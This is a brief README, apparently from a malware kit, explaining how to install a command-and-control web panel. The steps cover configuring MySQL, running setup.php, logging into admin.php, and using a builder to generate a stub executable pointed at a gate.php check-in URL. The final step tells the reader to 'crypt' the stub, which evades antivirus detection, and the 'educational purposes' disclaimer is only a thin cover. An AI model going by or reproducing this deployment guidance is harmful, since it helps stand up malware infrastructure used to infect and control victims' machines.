Hosted for educational purposes. I do not own any of this source.
--------------------------------------------------------------------------------------
1. Upload the panel files.
2. Make a MySQL database.
3. Edit the uploadedd Config.php with your mysql logins and database.
4. Save it.
5. Go to your browser. And surf to: YOURDOMAINORIP/yourpanellocation/setup.php
6. Put the info in the setup carefully and do not lose your data's!
7. Delete the install.php from your Public_html map.
8. Surf to: YOURDOMAINORIP/yourpanellocation/admin.php and login.
9. Open the builder, and make the gate url: YOURDOMAINORIP/yourpanellocation/gate.php
& the Bin url YOURDOMAINORIP/yourpanellocation/yourstubnamethatyougonnabuild.exe
10. Make the output filename the same as you typed in the Bin url!
11. CRYPT THAT BABY AND YOU ARE READY TO GO :)